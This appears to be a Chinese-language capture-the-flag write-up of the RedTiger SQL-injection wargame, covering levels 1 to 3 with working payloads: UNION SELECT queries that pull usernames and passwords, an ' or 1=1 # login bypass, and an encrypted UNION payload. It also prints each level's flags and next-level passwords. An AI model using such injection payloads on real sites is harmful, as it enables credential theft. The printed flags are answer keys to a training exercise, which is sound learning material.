sql注入挑战
level1
简单注入,payload:
http://redtiger.labs.overthewire.org/level1.php?cat=0 union select 1,2,username,password from level1_users
返回
Hornoxe
thatwaseasy
登录后显示
You made it!
You can raise your wechall.net score with this flag: 27cbddc803ecde822d87a7e8639f9315
The password for the next level is: passwords_will_change_over_time_let_us_do_a_shitty_rhyme
level2
万能密码登录bs抓包改POST内容:username=admin&password=' or 1=1 # &login=Login
You can raise your wechall.net score with this flag: 1222e2d4ad5da677efb188550528bfaa
The password for the next level is: feed_the_cat_who_eats_your_bread
level3
输入数组显示报错信息
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 26
构造http://redtiger.labs.overthewire.org/urlcrypt.inc 得到源码
用源码加密明文' union select 1,password,2,3,4,5,6 from level3_users where username=’Admin
后构造payload
得到
Show userdetails:
Username: thisisaverysecurepasswordEEE5rt
First name: 5
Name: 6
ICQ: 4
Email: 3
登录得到
Login correct. You are admin :);
You can raise your wechall.net score with this flag: a707b245a60d570d25a0449c2a516eca
The password for the next level is: put_the_kitten_on_your_head
level4
盲注
Level5
登录过滤
待续